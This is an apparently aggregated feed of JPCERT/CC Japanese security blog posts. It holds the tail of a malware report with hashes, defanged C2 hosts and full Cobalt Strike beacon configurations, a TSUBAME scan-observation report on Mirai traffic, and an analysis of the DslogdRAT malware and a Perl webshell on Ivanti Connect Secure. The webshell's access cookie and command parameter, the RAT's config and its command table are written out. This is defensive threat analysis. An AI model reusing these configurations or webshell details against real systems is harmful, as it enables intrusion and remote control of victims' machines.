<td>Encrypted Channel</td> <td>TLSやカスタム暗号化プロトコルを利用し、C2通信を暗号化</td> </tr> </tbody> </table> <h4>Appendix B：マルウェア</h4> 表2: マルウェア <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 15%;"> <col style="width: 15%;"> <col style="width: 70%;"> </colgroup> <thead> <tr> <th>Malware</th> <th>Filename</th> <th>SHA256 Hash</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">Python(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">python.exe</td> <td>0cbf71efa09ec4ce62d95c1448553314728ed5850720c8ad40352bfbb39be99a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Fscan Loader</td> <td style="word-wrap: break-word; white-space: normal;">python311.dll</td> <td>699290a753f35ae3f05a7ea1984d95f6e6f21971a146714fca5708896e5e6218</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Fscan</td> <td style="word-wrap: break-word; white-space: normal;">k.bin</td> <td>cff2afc651a9cba84a11a4e275cc9ec49e29af5fd968352d40aeee07fb00445e</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Java RMI Compiler(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">rmic.exe</td> <td>a747be292339eae693b7c26cac0d33851cba31140fd0883371cc8de978583dbe</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">push_detect(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">push_detect.exe</td> <td>f12250a43926dba46dcfb6145b7f1a524c0eead82bd1a8682307d1f2f1f1e66f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">MDifyLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td>45ecb7b23b328ab762d8519e69738a20eb0cd5618a10abb2c57a9c72582aa7e7</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">MDifyLoader</td> <td style="word-wrap: break-word; white-space: normal;">Microsoft.WindowsAppRuntime.Bootstrap.dll</td> <td>9e91862b585fc4d213e9aaadd571435c1a007d326bd9b07b72dbecb77d1a27ac</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike version 4.5</td> <td style="word-wrap: break-word; white-space: normal;">update.dat</td> <td>09087fc4f8c261a810479bb574b0ecbf8173d4a8365a73113025bd506b95e3d7</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike version 4.5</td> <td style="word-wrap: break-word; white-space: normal;">config.ini</td> <td>1652ab693512cd4f26cc73e253b5b9b0e342ac70aa767524264fef08706d0e69</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">vshell</td> <td style="word-wrap: break-word; white-space: normal;">ws_windows_amd2.exe</td> <td>48f3915fb8d8ad39dc5267894a950efc863bcc660f1654187b3d77a302fd040f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">vshell</td> <td style="word-wrap: break-word; white-space: normal;">ws_windows_amd64.exe</td> <td>54350d677174269b4dc25b0ccfb0029d6aeac5abbbc8d39eb880c9fd95691125</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">vshell</td> <td style="word-wrap: break-word; white-space: normal;">ws.exe</td> <td>85f9819118af284e6b00ce49fb0c85ff0c0b9d7a0589e1bb56a275ed91314965</td> </tr> </tbody> </table> <h4>Appendix C：通信先</h4> <ul> <li>172.237.6[.]207:80</li> <li>proxy.objectlook[.]com:80</li> <li>api.openedr.eu[.]org:443</li> <li>community.openedr.eu[.]org:443</li> <li>query.datasophos[.]com:443</li> </ul> <h4>Appendix D：各コンフィグ情報</h4> <ul> <li>vshellのコンフィグ</li> </ul> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> {"server":"proxy.objectlook[.]com:80","type":"ws","vkey":"safeshell","proxy":"http[:]//10.71.30[.]140:8080","salt":"safeshell","l":false,"e":false} </pre> <ul> <li>Cobalt Strikeのコンフィグ</li> </ul> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> BeaconType - HTTPS Port - 443 SleepTime - 97352 MaxGetSize - 2105202 Jitter - 48 MaxDNS - Not Found PublicKey_MD5 - e880c4268fb48aebc5510e02f49d3bce C2Server - api.openedr.eu[.]org,/avatar/js/flashdetect.min.js,community.openedr.eu[.]org,/avatar/js/utm5.min.js UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 HttpPostUri - /Destroy/stylesheets/color_definitions_base Malleable_C2_Instructions - Remove 2025 bytes from the end Remove 6017 bytes from the beginning NetBIOS decode 'a' XOR mask w/ random key HttpGet_Metadata - ConstHeaders Accept: application/json, application/xml, text/html Accept-Language: zh-hk Accept-Encoding: br, compress Metadata mask base64url prepend "secure_id_4427KV8TXLHDJ9YJAM5XRIXHI12=" header "Cookie" HttpPost_Metadata - ConstHeaders Accept: text/html, application/json, image/* Accept-Language: ar-ma Accept-Encoding: gzip, * SessionId mask base64url parameter "_SFUYPJNK" Output mask netbiosu print PipeName - Not Found DNS_Idle - Not Found DNS_Sleep - Not Found SSH_Host - Not Found SSH_Port - Not Found SSH_Username - Not Found SSH_Password_Plaintext - Not Found SSH_Password_Pubkey - Not Found SSH_Banner - HttpGet_Verb - GET HttpPost_Verb - POST HttpPostChunk - 0 Spawnto_x86 - %windir%\syswow64\svchost.exe -k wksvc Spawnto_x64 - %windir%\sysnative\SearchProtocolHost.exe CryptoScheme - 0 Proxy_Config - Not Found Proxy_User - Not Found Proxy_Password - Not Found Proxy_Behavior - Use IE settings Watermark_Hash - MYhXSMGVvcr7PtOTMdABvA== Watermark - 666666 bStageCleanup - True bCFGCaution - False KillDate - 0 bProcInject_StartRWX - False bProcInject_UseRWX - False bProcInject_MinAllocSize - 6771 ProcInject_PrependAppend_x86 - b'\x90\x90\x90f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1fD\x00\x00PXf\x90PX\x0f\x1f\x00\x0f\x1fD\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x00PXPX\x0f\x1f\x80\x00\x00\x00\x00f\x90\x0f\x1f\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00' b'f\x0f\x1fD\x00\x00\x0f\x1f\x80\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x00\x90\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x80\x00\x00\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00' ProcInject_PrependAppend_x64 - b'\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x80\x00\x00\x00\x00f\x90PX\x0f\x1f@\x00\x0f\x1f\x80\x00\x00\x00\x00\x0f\x1f@\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00\x90PX\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f@\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f@\x00f\x0f\x1fD\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00' b'\x90\x0f\x1f\x00PX\x90PX\x0f\x1f@\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00PX\x0f\x1f\x84\x00\x00\x00\x00\x00f\x90PX\x0f\x1fD\x00\x00\x0f\x1fD\x00\x00' ProcInject_Execute - ntdll:RtlUserThreadStart CreateThread NtQueueApcThread-s CreateRemoteThread RtlCreateUserThread ProcInject_AllocationMethod - NtMapViewOfSection bUsesCookies - True HostHeader - headersToRemove - Not Found DNS_Beaconing - Not Found DNS_get_TypeA - Not Found DNS_get_TypeAAAA - Not Found DNS_get_TypeTXT - Not Found DNS_put_metadata - Not Found DNS_put_output - Not Found DNS_resolver - Not Found DNS_strategy - failover DNS_strategy_rotate_seconds - -1 DNS_strategy_fail_x - 100 DNS_strategy_fail_seconds - -1 Retry_Max_Attempts - 0 Retry_Increase_Attempts - 0 Retry_Duration - 0 </pre> <ul> <li>Cobalt Strikeのコンフィグ</li> </ul> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> BeaconType - HTTPS Port - 443 SleepTime - 92318 MaxGetSize - 1408170 Jitter - 48 MaxDNS - Not Found PublicKey_MD5 - 492cdc5bc3d8cc5e6440a0da246f6684 C2Server - query.datasophos[.]com,/Enable/v5.10/VPGH7WQQPR UserAgent - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 HttpPostUri - /Enable/v8.20/STE7U5WILZII Malleable_C2_Instructions - Remove 7449 bytes from the end Remove 2614 bytes from the beginning Base64 URL-safe decode XOR mask w/ random key HttpGet_Metadata - ConstHeaders Accept: application/xml, application/xhtml+xml, image/* Accept-Language: fr-lu Accept-Encoding: gzip, br Metadata mask netbios prepend "affiliate_id_69W8Y3G469RVG2W2=" header "Cookie" HttpPost_Metadata - ConstHeaders Accept: application/xhtml+xml, image/*, text/html Accept-Language: zh-tw Accept-Encoding: compress, gzip SessionId mask netbios parameter "_TXLXHKQC" Output mask netbiosu print PipeName - Not Found DNS_Idle - Not Found DNS_Sleep - Not Found SSH_Host - Not Found SSH_Port - Not Found SSH_Username - Not Found SSH_Password_Plaintext - Not Found SSH_Password_Pubkey - Not Found SSH_Banner - HttpGet_Verb - GET HttpPost_Verb - POST HttpPostChunk - 0 Spawnto_x86 - %windir%\syswow64\w32tm.exe Spawnto_x64 - %windir%\sysnative\WUAUCLT.exe CryptoScheme - 0 Proxy_Config - Not Found Proxy_User - Not Found Proxy_Password - Not Found Proxy_Behavior - Use IE settings Watermark_Hash - MYhXSMGVvcr7PtOTMdABvA== Watermark - 666666 bStageCleanup - True bCFGCaution - False KillDate - 0 bProcInject_StartRWX - False bProcInject_UseRWX - False bProcInject_MinAllocSize - 6344 ProcInject_PrependAppend_x86 - b'PX\x0f\x1f\x84\x00\x00\x00\x00\x00f\x0f\x1fD\x00\x00PXf\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x80\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x90f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x80\x00\x00\x00\x00\x90\x90\x90\x0f\x1f\x80\x00\x00\x00\x00\x90' b'f\x0f\x1fD\x00\x00\x0f\x1f@\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f@\x00' ProcInject_PrependAppend_x64 - b'\x0f\x1f\x00\x90PX\x0f\x1f\x80\x00\x00\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x00\x0f\x1f\x80\x00\x00\x00\x00\x0f\x1f\x00\x90\x90' b'\x0f\x1f\x00PXf\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1fD\x00\x00f\x0f\x1fD\x00\x00' ProcInject_Execute - ntdll:RtlUserThreadStart CreateThread NtQueueApcThread-s CreateRemoteThread RtlCreateUserThread ProcInject_AllocationMethod - VirtualAllocEx bUsesCookies - True HostHeader - headersToRemove - Not Found DNS_Beaconing - Not Found DNS_get_TypeA - Not Found DNS_get_TypeAAAA - Not Found DNS_get_TypeTXT - Not Found DNS_put_metadata - Not Found DNS_put_output - Not Found DNS_resolver - Not Found DNS_strategy - round-robin DNS_strategy_rotate_seconds - -1 DNS_strategy_fail_x - -1 DNS_strategy_fail_seconds - -1 Retry_Max_Attempts - 0 Retry_Increase_Attempts - 0 Retry_Duration - 0 </pre>
TSUBAMEレポート Overflow（2025年1～3月）

Fri, 06 Jun 2025 02:00:00 -0000

はじめにこのブログ「TSUBAMEレポート Overflow」では、四半期ごと...

<h3>はじめに</h3> このブログ「TSUBAMEレポート Overflow」では、四半期ごとに公表している「<a href="https://www.jpcert.or.jp/tsubame/report/">インターネット定点観測レポート</a>」の公開にあわせて、レポートには記述していない海外に設置しているセンサーの観測動向の比較や、その他の活動などをまとめて取り上げていきます。 今回は、TSUBAME（インターネット定点観測システム）における2025年1～3月の観測結果についてご紹介します。 <h3>2024年度の観測状況から見る日本国内の影響について</h3> JPCERT/CCでは、日々TSUBAMEで収集したデータを分析しています。今回は、2024年度の観測結果から日本国内に関連するインシデント例を振り返ってみたいと思います。 インターネット定点観測レポートでも触れているように、TSUBAMEが最も多く観測するパケットは23/TCP宛ての探索です。23/TCP宛てで観測されるパケットはMiraiの特徴を持っていることがあります。この特徴を持ったパケットが占める割合を図1に示しました。2024年5月ごろ、9月から12月ごろ、2025年3月ごろは23/TCP宛てのパケットのうちMiraiの特徴を持ったものが50%を超えています。それ以外の時期においては、Miraiの特徴を持たない別のIoT機器を対象としたパケットを観測しており、攻撃対象となるIoT機器も多岐にわたっていました。 <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2024q4blogfig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2024q4blogfig1.png" width="1153" height="552" alt="" class="asset asset-image at-xid-3752125" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">図1：日本国内から送信されたPort23/TCPにおけるMiraiの特徴を持った送信元数の推移</td> </tr> </tbody> </table> TSUBAMEでは、不審なスキャンを観測した場合に、日本国内を送信元としているIPアドレスについては、インシデントの通知や情報提供のため、Webの応答やSHODAN等を用いて、情報の収集や原因となっている機器の特定を試みています。上に挙げた３つの特徴的な期間において、送信元では次のような機器が目立ちました。 <ul> <li>2024年5月ごろ：海外ベンダー製（TP-Link等）のルーター</li> <li>2024年9月から12月ごろ：海外ベンダー製の監視カメラやDVR、NAS</li> <li>2025年2月から3月ごろ：海外ベンダー製（ASUS等）のルーター</li> </ul> なお、Miraiの特徴を持つ探索を確認した送信元のIPアドレスからは、23/TCP宛て以外の通信も確認できます。攻撃対象となる製品上で、インターネットからアクセス可能な通信ポートや脆弱性情報などを認識して探索が行われていると考えられます。 そのほか、同期間中は複数の企業のWebサーバーなどからの跳ね返りパケット等を観測しました。これらは組織を対象としたDDoS攻撃の一部と考えられるため、CSIRTなどのコミュニティー等のパスを使用して観測データの提供を行いました。 これらの活動から得られた知見をもとに、国内の製品開発者や通信事業者に対してMiraiによる攻撃の動向についての情報提供や、対策方法について議論を行う等の活動を行いました。ルーターなどをインターネットに接続して利用する際には、Miraiへの感染被害を拡げないように注意し、ボットネットの拡大を防ぐことが不可欠です。インターネットを通じて攻撃者からもアクセスされることを意識し、最新のファームウェアを使用したり、適切な設定を施したりするなど、注意して利用してください。設置後はポートスキャンなどを行い不要な通信ポートがアクセスできるようになっていないか検査を行うことや、SHODAN等を利用して確認してみることもお勧めします。 TSUBAMEでは、引き続き特定の製品を狙った攻撃や不審なパケットの送信元が発生することがあると想定し、製品開発者や通信事業者らに対して観測データなどの情報提供を行い、問題解決の一助となる活動を行っていく予定です。 <h3>国内外の観測動向の比較</h3> 図2は、1月～3月に国内外のセンサー1台が1日あたりに受信したパケット数の平均を月ごとに比較したものです。国内のセンサーよりも海外のセンサーで多くのパケットを観測していますが、3月は国内外ともにパケット数が増加しました。 <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2024q4blogfig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2024q4blogfig2.png" width="1152" height="549" alt="" class="asset asset-image at-xid-3752127" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">図2：月ごとの国内外センサー平均パケット数の比較</td> </tr> </tbody> </table> <h3>センサーごとの観測動向の比較</h3> 各センサーには、それぞれグローバルIPアドレスが1つ割り当てられています。各センサーで観測状況に違いがあるかを見るために、表1に国内外のセンサーごとに届いたパケットTOP10をまとめました。センサーごとに順位の違いはありますが、23/TCP、6379/TCP、22/TCP、8080/TCP、80/TCP、ICMP等はほぼすべてのセンサーで観測していました。これらは広範囲のネットワークにてスキャンが行われていることを示唆していると考えられます。 表1：国内外センサーごとのパケットTOP10の比較 <table> <tbody> <tr><th></th><th>国内センサー1</th><th>国内センサー2</th><th>国内センサー3</th><th>海外センサー1</th><th>海外センサー2</th><th>海外センサー3</th></tr> <tr><td align="right">1番目</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>ICMP</td></tr> <tr><td align="right">2番目</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>23/TCP</td></tr> <tr><td align="right">3番目</td><td>123/UDP</td><td>80/TCP</td><td>22/TCP</td><td>22/TCP</td><td>80/TCP</td><td>8728/TCP</td></tr> <tr><td align="right">4番目</td><td>22/TCP</td><td>22/TCP</td><td>80/TCP</td><td>80/TCP</td><td>ICMP</td><td>22/TCP</td></tr> <tr><td align="right">5番目</td><td>80/TCP</td><td>ICMP</td><td>ICMP</td><td>ICMP</td><td>443/TCP</td><td>80/TCP</td></tr> <tr><td align="right">6番目</td><td>ICMP</td><td>8080/TCP</td><td>443/TCP</td><td>443/TCP</td><td>22/TCP</td><td>443/TCP</td></tr> <tr><td align="right">7番目</td><td>8080/TCP</td><td>443/TCP</td><td>8080/TCP</td><td>8080/TCP</td><td>8080/TCP</td><td>8080/TCP</td></tr> <tr><td align="right">8番目</td><td>443/TCP</td><td>6379/TCP</td><td>6379/TCP</td><td>6379/TCP</td><td>6379/TCP</td><td>3389/TCP</td></tr> <tr><td align="right">9番目</td><td>6379/TCP</td><td>81/TCP</td><td>34567/TCP</td><td>445/TCP</td><td>2222/TCP</td><td>445/TCP</td></tr> <tr><td align="right">10番目</td><td>34567/TCP</td><td>123/UDP</td><td>445/TCP</td><td>2222/TCP</td><td>3389/TCP</td><td>34567/TCP</td></tr> </tbody> </table> <h3>おわりに </h3> 複数の地点で観測を行うことで、特定のネットワークだけで変動が起きているのかどうかを判断できるようになります。本四半期は、特別な号外による注意喚起等の情報発信には至っていませんが、スキャナーの存在には注意が必要です。今後もレポート公開にあわせて定期的なブログの発行を予定しています。特異な変化などがあった際は号外も出したいと思います。皆さまからのご意見、ご感想も募集しております。掘り下げて欲しい項目や、紹介して欲しい内容などがございましたら、お問い合わせフォームよりお送りください。最後までお読みいただきありがとうございました。 サイバーメトリクスグループ鹿野恵祐 TSUBAMEレポート Overflow（2025年1～3月）
Ivanti Connect Secureに設置されたマルウェアDslogdRAT

Thu, 24 Apr 2025 06:00:00 -0000

以前、Ivanti Connect Secureの脆弱性を利用して設置されたマル...

以前、<a href="https://blogs.jpcert.or.jp/ja/2025/02/spawnchimera.html" target="_blank">Ivanti Connect Secureの脆弱性を利用して設置されたマルウェアSPAWNCHIMERA</a>について紹介しましたが、SPAWNCHIMERAとは別のマルウェアも確認されています。今回は、2024年12月ごろに国内の組織に対する当時のゼロデイ脆弱性CVE-2025-0282を使った攻撃によって設置されたWebシェルとマルウェアDslogdRATについて解説します。 <h3>設置されたWebシェルの機能</h3> Perlで記述されたWebシェルの一部を図1に示します。本Perlスクリプトは、CGIとして実行され、受信したHTTPリクエストのCookieヘッダーを取得し、DSAUTOKEN=の値がaf95380019083db5と一致する場合、リクエストパラメーターdataで指定された任意のコマンドをsystem関数によって実行するシンプルなWebシェルです。攻撃者はこのWebシェルにアクセスし、コマンドを実行することで、次に解説するDslogdRATなどのマルウェアを実行したと考えられます。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/dslogdrat01-800wri.png" width="800" height="355" alt="" class="asset asset-image at-xid-3713877 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図1：Webシェルの一部 </div> <h3>DslogdRATの概要</h3> DslogdRATの動作フローを図2に示します。DslogdRATが実行すると、本体のプロセスでは1つ目の子プロセスを作成し、動作を終了します。その作成された子プロセスにてコンフィグのデコードを行い、2つ目の子プロセスを作成します。1つ目の子プロセスはSleepが含まれたループのルーチンに入るため、終了しません。作成された2つ目の子プロセスにDslogdRATの主要な機能が含まれており、次に示す機能があります。 <ul> <li>コンフィグデータに基づいてC2サーバーとの通信を開始する</li> <li>ワーカースレッドを立ち上げ、通信に使用するソケット情報をスレッドへ受け渡す</li> </ul> ワーカースレッドによってC2サーバーへのデータ送受信、各種コマンド実行などの処理が行われます。なお、スレッドの作成などはpthreadライブラリを使用して実装されています。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/dslogdrat02-800wri.png" width="800" height="384" alt="" class="asset asset-image at-xid-3713878 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図2：DslogdRATの動作フロー </div> <h3>DslogdRATのコンフィグデータ</h3> DslogdRATのコンフィグデータはエンコードされた状態で検体内にハードコードされており、0x63を鍵として、1バイトごとにXORにてデコードされます。そのコンフィグの構造をAppendix Aの表1に、デコードしたコンフィグデータを表2にそれぞれ示します。 デコードしたコンフィグデータから、DslogdRATは8時から20時まで動作し、それ以外はsleepする設定になっていました。これは業務時間内に通信を行うことで発見されにくくする狙いがあると考えられます。 <h3>DslogdRATの通信方式とコマンド実行</h3> DslogdRATはC2サーバーとのデータのやり取りをソケット通信によって行います。通信するデータの中身は図3に示す関数によってエンコードされます。エンコード・デコード関数は0x01から0x07まで7バイトずつXORするだけの単純なものでした。なお、プロキシ経由の通信もサポートしています。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/dslogdrat03-800wri.png" width="800" height="497" alt="" class="asset asset-image at-xid-3713879 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図3：DslogdRATのエンコード・デコード方式 </div> C2サーバーへの初期通信の復号例を図4に示します。初期通信では端末の基本的な情報をC2サーバーへと送信します。なお、送信されるデータは次のフォーマットにしたがって送信されます。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> 0x00: ff ff ff ff +0x04: 0f 00 +0x06: Data length +0x0A: Encoded data </pre> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/dslogdrat04-800wri.png" width="800" height="168" alt="" class="asset asset-image at-xid-3713880 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <img src="dslogdrat04.png" alt="dslogdrat04.png" /> <div style="text-align: center;"> 図4：DslogdRATの初期通信の復号例 </div> DslogdRATが実行可能なコマンドは、次に示すように、内部ネットワークへの侵害の起点となるような機能が確認できます。詳しいコマンド内容はAppendix Bに記載していますのでご確認ください。 <ul> <li>ファイルのアップロード・ダウンロード</li> <li>シェルコマンドの実行</li> <li>プロキシ機能</li> </ul> <h3>SPAWNSNARE</h3> その他、設置されたマルウェアとしてCISAおよびGoogle社によって2025年4月に報告<a href="#1">[1]</a><a href="#2">[2]</a>されたSPAWNSNAREも同一の端末上で確認されています。SPAWNSNAREの詳しい挙動はGoogle社の記事<a href="#1">[1]</a>をご参照ください。 <h3>おわりに</h3> DslogdRATを使う攻撃がUNC5221によるSPAWNファミリーを使う攻撃と同じキャンペーン<a href="#1">[1]</a>であるか、現時点では不明です。確認した通信先やハッシュ値、ファイルパスについては、AppendixC、Dにそれぞれ記載していますのでご確認ください。JPCERT/CCではIvanti Connect Secureに関連する脆弱性（CVE-2025-22457）の<a href="https://www.jpcert.or.jp/at/2025/at250008.html" target="_blank">注意喚起</a>を行っていますが、Ivanti Connect Secureを狙った攻撃は今後も継続して行われることが予想されます。引き続きこれらの攻撃に注意が必要です。 インシデントレスポンスグループ増渕維摩 <h4>参考情報</h4> <a name="1"></a>[1] Google Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457) <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability" target="_blank"> https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability</a> <a name="2"></a>[2] CISA MAR-25993211-r1.v1 Ivanti Connect Secure (RESURGE) <a href="https://www.cisa.gov/news-events/analysis-reports/ar25-087a" target="_blank"> https://www.cisa.gov/news-events/analysis-reports/ar25-087a</a> <h4>Appendix A：コンフィグ</h4> <div style="text-align: center;"> 表1: DslogdRATのコンフィグ構造 </div> <table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>0x0</td> <td>ConfigTag</td> </tr> <tr> <td>0x4</td> <td>Listen mode flag</td> </tr> <tr> <td>0x8</td> <td>C2 IP</td> </tr> <tr> <td>0x108</td> <td>C2 Port</td> </tr> <tr> <td>0x10C</td> <td>Sleep time</td> </tr> <tr> <td>0x110</td> <td>Timeout value</td> </tr> <tr> <td>0x114</td> <td>Shell filepath</td> </tr> <tr> <td>0x214</td> <td>String used in shell command</td> </tr> <tr> <td>0x314</td> <td>String used in thread</td> </tr> <tr> <td>0x414</td> <td>String used in node name</td> </tr> <tr> <td>0x514</td> <td>Proxy server</td> </tr> <tr> <td>0x614</td> <td>Proxy user</td> </tr> <tr> <td>0x714</td> <td>Proxy password</td> </tr> <tr> <td>0x814</td> <td>Proxy port</td> </tr> <tr> <td>0x818</td> <td>Lower hour limit</td> </tr> <tr> <td>0x81C</td> <td>Upper hour limit</td> </tr> <tr> <td>0x820</td> <td>Enable source port settings(Default port: 3039)</td> </tr> <tr> <td>0x824</td> <td>Used in setsockopt</td> </tr> <tr> <td>0x828</td> <td>Source port</td> </tr> <tr> <td>0x82C</td> <td>Enable sleep time</td> </tr> <tr> <td>0x830</td> <td>Enable sleep time</td> </tr> </tbody> </table> <div style="text-align: center;"> 表2: 復号したコンフィグデータ </div> <table> <thead> <tr> <th>Description</th> <th>Content</th> </tr> </thead> <tbody> <tr> <td>ConfigTag</td> <td>95 82 e3 0e</td> </tr> <tr> <td>Listen mode flag</td> <td>0</td> </tr> <tr> <td>C2 IP</td> <td>3.112.192[.]119</td> </tr> <tr> <td>C2 Port</td> <td>443</td> </tr> <tr> <td>Sleep time</td> <td>1250</td> </tr> <tr> <td>Timeout value</td> <td>30</td> </tr> <tr> <td>Shell filepath</td> <td>/bin/sh</td> </tr> <tr> <td>String used in shell command</td> <td>[kworker/0:02]</td> </tr> <tr> <td>String used in thread</td> <td>/home/bin/dslogd</td> </tr> <tr> <td>String used in node name</td> <td>null</td> </tr> <tr> <td>Proxy server</td> <td>127.0.0.1</td> </tr> <tr> <td>Proxy user</td> <td>admin</td> </tr> <tr> <td>Proxy password</td> <td>admin</td> </tr> <tr> <td>Proxy port</td> <td>65500</td> </tr> <tr> <td>Lower hour limit</td> <td>8</td> </tr> <tr> <td>Upper hour limit</td> <td>20</td> </tr> <tr> <td>Enable source port settings(Default port: 3039)</td> <td>0</td> </tr> <tr> <td>Used in setsockopt</td> <td>240</td> </tr> <tr> <td>Source port</td> <td>12345</td> </tr> <tr> <td>Enable sleep time</td> <td>1</td> </tr> <tr> <td>Enable sleep time</td> <td>1</td> </tr> </tbody> </table> <h4>Appendix B：コマンド</h4> <div style="text-align: center;"> 表3: DslogdRATのコマンド一覧 </div> <table> <thead> <tr> <th>Value</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>0x4</td> <td>File download</td> </tr> <tr> <td>0x8</td> <td>Set upload file</td> </tr> <tr> <td>0xA</td> <td>File upload</td> </tr> <tr> <td>0xC</td> <td>Shell</td> </tr> <tr> <td>0xD</td> <td>Get shell data</td> </tr> <tr> <td>0xE</td> <td>Exit shell</td> </tr> <tr> <td>0x11</td> <td>Set sleep time</td> </tr> <tr> <td>0x13</td> <td>Run proxy</td> </tr> <tr> <td>0x16</td> <td>Get proxy data</td> </tr> <tr> <td>0x17</td> <td>Stop proxy</td> </tr> <tr> <td>0x18</td> <td>Stop all proxy</td> </tr> <tr> <td>0x28</td> <td>Forwarding</td> </tr> <tr> <td>0x29</td> <td>Stop fowarding</td> </tr> </tbody> </table> <h4>Appendix C：通信</h4> <ul> <li>DslogdRATの通信: 3.112.192[.]119</li> </ul> <h4>Appendix D：マルウェアのハッシュ値</h4> <div style="text-align: center;"> 表4: 各ファイルパスとハッシュ値 </div> <table> <thead> <tr> <th>File</th> <th>Path</th> <th>Hash</th> </tr> </thead> <tbody> <tr> <td>DslogdRAT</td> <td>/home/bin/dslogd</td> <td>1dd64c00f061425d484dd67b359ad99df533aa430632c55fa7e7617b55dab6a8</td> </tr> <tr> <td>Webshell</td> <td>/home/webserver/htdocs/dana-na/cc/ccupdate.cgi</td> <td>f48857263991eea1880de0f62b3d1d37101c2e7739dcd8629b24260d08850f9c</td> </tr> <tr> <td>SPAWNSNARE</td> <td>/bin/dsmain</td> <td>b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d</td> </tr> </tbody> </table>
RightsCon 2025参加記

Wed, 09 Apr 2025 04:00:00 -0000

こんにちは、国際部の米澤です。2025年2月24日から27日にかけて、台北市で開...

